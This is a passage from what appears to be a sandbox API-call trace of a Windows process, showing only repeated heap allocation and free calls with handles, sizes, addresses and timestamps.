HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0061.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.324] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.324] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.324] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.324] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0061.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.324] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.324] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.324] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.324] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.324] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.324] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.324] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.324] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.324] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.324] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.324] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.324] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.324] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 